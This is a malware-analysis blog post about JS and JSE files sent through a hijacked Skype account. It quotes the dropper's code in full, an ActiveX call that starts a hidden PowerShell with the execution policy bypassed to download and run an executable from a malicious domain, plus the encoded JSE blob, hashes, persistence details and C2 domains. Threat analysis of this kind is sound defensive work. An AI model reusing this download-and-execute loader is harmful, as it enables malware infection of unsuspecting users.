2016/08/24

Something Phishy – 08-24-2016

by Destruct_Icon
Categories: News
Tags: No Tags
Comments: Leave a Comment

Destruct_Icon here with another Something Phishy report. This was slightly a new one on me so I felt it was necessary to write about it. Have you had a friend or family member have their Skype account hijacked for the purpose of spamming out malicious links? This has been a pretty common situation over the past few years however I recently was hit with a JS and JSE file transfer.

DIspskypemessage

Well if the stranger is kind enough to offer some candy, I’ll be happy to take a piece! The first artifact I opened was the JS file.

File Name: camera_private parking_warning.js
MD5 Hash: acd7403a9df161da28e45594738c71ff
File Size: 331 bytes

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://sonovate.biz/templates/sb4associate8/u6yyyettd.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);

Looks like we’ve got some powershell goodness reaching out to pull down some malware. Well this file is pretty straight forward so let’s jump to the JSE. If you are unfamiliar with JSE, this is a Javascript encoded file.

File Name: photo from facebook 09082016.jse
MD5 Hash: 0c2245cb8c28a83aa777ab2f202cec90
File Size: 359 bytes

#@~^TgEAAA==-mD~^k9ky.y,xP    +APzmOr7+(}8LmYvEdtV^RCw2sbmCYbGxr#I@#@&Vk[r.y"RU4VsA6mED+vEmsN +X+ES,Jz1~wKh+Md4+^Vc+a+~RA6nm!OkKxKG^kmz~(X2lkd,OUKwMW0bV~OSkUNKhdOHV+,4k9N+    ~c1h r8Ln^DPjXkO+sRHnDRn8;Vr+    O*R9Kh    VWmNwrV`vtDY2lJz/KUW7lY 8k.zD+hwsCD+dzk8cm/dG1klOnRz;vHzH+ODNc+6BBv]znKfzK)Yc+6v#p?Ym.OOhDKmn/d~E])nh9b:bY 6+vEBPEJB~rW2xr~PZ#piHIAAA==^#~@

Now to try and make this make sense. After a bit of searching on google, we found an awesome program called “Windows Script Decoder” which will decode JSE files. Running the decoder is as easy as pointing it to the JSE file in question and defining an output.

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://sonovate.biz/templates/sb4associate8/u6yyyettd.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);

It looks like the JS and JSE are making the same requests. Let’s pull down the malware and see what we can find out.

Domain: sonovate[.]biz
DomainTools: http://whois.domaintools.com/sonovate.biz
VirusTotal: https://virustotal.com/en/url/2e5ec7a0bbfcfb4e265752ec69b2e7d29fdced0bba8df5ca1fd2dd07248a6293/analysis/1471945707/

DIdropper

File Name: u6yyyettd.exe
MD5 Hash: a073e9a3a4666f390b3a4d6fe4dc940c
ssdeep signature: 6144:qGTA/YxpHHFS4EKH/BbWlJtT7qCeHQjbXBcsBwH+clrzy3/gANsSve:w/Yx/lEQ/V0nlusyHLlrzAgAmx
File Size: 400213 bytes

https://virustotal.com/en/file/d22cff35e69ecaaf0efaab07a74c04082a9ea9f7498978f6b1377d98cd6fea7c/analysis/

The file wasn’t properly executing under buster sandbox but we were able to extract some details of the malware prior to running it. If you aren’t aware of what buster sandbox is, check it out!

File Version : 1.0.0.125
Product Version : 1.0.0.125
Comments : FEFS organizeaza cursuri de masterat
Company Name : FlaSH ailover with redundant hardware and continuing
File Description : ultura fizica si sport, Kinetoterapie, Master invatamant zi si frecventa redusa. FEFS Iasi.. Facultatea de Educatie Fizica si Sport.
File Version : 1.00.0125
Internal Name : FiHoP
Original File Name : FiHoP.exe
Product Name : ROCKO
Product Version : 1.00.0125
Time Date Stamp : 10.08.2016 06:15

DIsomethingphishyprefetchWe popped our box and was able to get some more details about the malware. Checking out the prefetch shows cmd.exe running and a new EXE spawning. The u6yyyettd.exe appeared to remove itself from the current directory and the new location of the malware was in %USERPROFILE%/AppData/Roaming/Icybdykoh which was the keumpimebye.exe file seen in the prefetch.

DIsomethingphishyroaming

File Name: keumpimebye.exe
MD5 Hash: 25139feab586e009fe962b20ec8f86ff
ssdeep signature: 6144:qGTA/YxpHHFS4EKH/BbWlJtT7qCeHQjbXBcsBwH+clrzy3/gANsSvO:w/Yx/lEQ/V0nlusyHLlrzAgAmN
File Size: 400213 bytes
Analysis MALWR: https://malwr.com/analysis/M2JkNGQ0NjY5YTgzNDMzZDk4MDllODEzM2FmZmE0N2Q/
Analysis VirusTotal: https://virustotal.com/en/file/61aaa22f1d53c0f27d57e3afeddbf53d5fd76a8390396ac22bc8b087ce1f7bd7/analysis/

Although the MD5 hash is different, we see that the SSDEEP is the same between files suggesting that the overall function is the same. Looking at the process listing, we have the same description as pulled from the original file.

DIsomethingphishymalware

This process also created a persistence mechanism in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run which pointed right back to the malware in the roaming folder.

DIsomethingphishyregistry

Another noteworthy file created the moment that the infection happened was also dumped in a randomly named folder in the AppData\Roaming path. The file was called nuavnias.tmp and had about 12KB of data. It appeared to be encoded data at a quick glance. We have seen a lot of similar malware dump data to tmp files which wait for extraction from C2 commands.

DIsomethingphishycalloutsSpeaking of C2, the last quick tidbit was observing the domains being requested. It looks like there’s some randomly generated domains which were alternating between xcbvmxcmvoiurei[.]ru (VT Info) and sjkdhfjkdsf[.]ru (VT Info).

Thank you for taking a quick gander at this Something Phishy report. It was interesting to see a new infection vector via Skype through a JSE file. Despite the javascript, everything revolved around the powershell payload retrieval command. If you are in a business setting, PLEASE be sure to keep an eye out for either the .DownloadFile from net.webclient or even encoded powershell as it has been a very strong indicator of malware for us. I will be adding all of the information from this report to our intel feed in the next day or so.


Leave a Reply

Your email address will not be published. Required fields are marked *



Today is Friday
2018/02/23